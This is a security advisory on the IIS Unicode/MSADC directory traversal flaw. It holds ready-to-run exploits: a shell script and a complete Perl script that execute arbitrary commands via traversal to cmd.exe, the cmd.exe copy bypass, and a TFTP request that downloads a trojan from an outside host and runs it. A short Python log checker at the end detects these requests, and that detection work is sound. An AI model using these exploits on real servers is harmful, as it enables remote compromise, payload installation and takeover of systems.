As we reported in our previous article, Web Server Folder Traversal vulnerability, IIS suffers from a security vulnerability that allows remote attackers to execute arbitrary commands. Additional details have come to our attention, and are presented in the following advisory.
Credit:
The information has been provided by Marco, Zoa_Chien and Nsfocus Security Team.
MSADC "bypass"
By supplying /msadc in the URL, it is possible to "escape" from the web root directory, and reach other directories that are not usually accessible through normal HTTP requests.
Exploit:
---runaway.sh----
#!/bin/sh
lynx -dump http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7
--------------
Example:
./runaway.sh www.example.com dir c:\\ (<- note the double backslash).
Using TFTP to "complete the circle"
By using tftp.exe (a utility that ships with WinNT and Win2K), it is possible to complete the attack and compromise the underlying operating system. There is nothing new about TFTP itself, but by using a TFTP daemon (tftpd), the command execution vulnerability can be used to download a Trojan file onto the server and then execute it, thus gaining further privileges.
Exploit:
Sending this URL:
/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
Will download the file 'ncx99.exe'.
After that, the Trojan can be executed by requesting the URL:
/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe
CMD1.EXE copying & bypassing
By copying the "cmd.exe" into any other filename (for example: "cmd1.exe") you can bypass IIS's restriction on redirection of output.
Example:
(1) Copy "..\..\winnt\system32\cmd.exe" to "..\..\inetpub\scripts\cmd1.exe":
http://www.example.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe
(2) Run "cmd1.exe /c echo abc >aaa & dir & type aaa "
http://www.example.com/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa
Complete exploit (for "cmd1.exe" bypass):
#!/usr/bin/perl
# Very simple PERL script to execute commands on IIS Unicode vulnerable servers
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodexecute2 IP:port command
# Only makes use of "Socket" library
#
# New in version2:
# Copy the cmd.exe to something else, and then use it.
# The script checks for this.
# Thnx to security@nsfocus.com for discovering the cmd.exe copy part
#
# Roelof Temmingh 2000/10/26
# roelof@sensepost.com http://www.sensepost.com
use Socket;
# --------------init
if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
($host,$port)=split(/:/,$ARGV[0]);
$target = inet_aton($host);
# --------------test if cmd has been copied:
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line (@results){
    if ($line =~ /sensepost.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
    print "Sensepost.exe not found - Copying CMD...\n";
    $command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe";
    $command=~s/ /\%20/g;
    @results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
    foreach $line2 (@results2){
        if (($line2 =~ /copied/ )) {$failed2=0;}
    }
    if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"};
}
# ------------ we can assume that the cmd.exe is copied from here..
$command=$ARGV[1];
print "Sensepost.exe found - Executing [$command] on $host:$port\n";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
    my ($pstr)=@_;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
        die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        my @in;
        select(S); $|=1; print $pstr;
        while(<S>){ push @in, $_;}
        select(STDOUT); close(S); return @in;
    } else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
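As an added defender-side example (not part of the advisory or of the SensePost script), the following Python checker decodes a requested URL path the way a lenient UTF-8 decoder would, reports the overlong escapes the MSADC and cmd1.exe sections rely on (%c0%af collapsing to "/", %c1%9c to "\"), and tells whether the normalised path climbs above the web root; the lenient-decoder model is an assumption about why the server's "../" check did not fire, and the sample requests are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong two-byte UTF-8 forms (lead byte 0xC0 or 0xC1) are invalid UTF-8;
# a strict decoder rejects them, but a lenient decoder maps them onto the
# ASCII byte they encode, e.g. C0 AF -> "/" and C1 9C -> "\". (Assumption:
# this is the model used here for why the "../" check saw no traversal.)
_OVERLONG2 = re.compile(rb"[\xc0\xc1][\x80-\xbf]")

def lenient_decode(raw: bytes) -> str:
    """Collapse overlong 2-byte sequences to the ASCII char they encode."""
    def collapse(m):
        lead, cont = m.group(0)
        return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])
    return _OVERLONG2.sub(collapse, raw).decode("latin-1")

def analyze_request_path(path: str) -> dict:
    """Flag overlong escapes and web-root escapes in a requested URL path."""
    raw = unquote_to_bytes(path)
    overlong = [m.group(0).hex() for m in _OVERLONG2.finditer(raw)]
    # Treat "\" like "/" (as the Windows filesystem does) and stop at the
    # query string or the first "+" (IIS passes the rest as arguments).
    decoded = lenient_decode(raw).replace("\\", "/")
    file_path = re.split(r"[?+]", decoded, maxsplit=1)[0]
    depth, escaped = 0, False
    for seg in file_path.split("/"):
        if seg == "..":
            depth -= 1
            escaped = escaped or depth < 0   # climbed above the web root
        elif seg and seg != ".":
            depth += 1
    return {
        "overlong": overlong,
        "decoded": decoded,
        "escaped_root": escaped,
        "target": file_path.rsplit("/", 1)[-1].lower(),
        "suspicious": bool(overlong) or escaped,
    }

if __name__ == "__main__":
    # Constructed sample request, shaped like the ones in the advisory.
    print(analyze_request_path("/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"))
```

Run it over the request field of your web server logs; any hit with a non-empty "overlong" list or "escaped_root" set is worth a look, and a file target of cmd.exe or tftp.exe under a scripts directory matches the pattern described above.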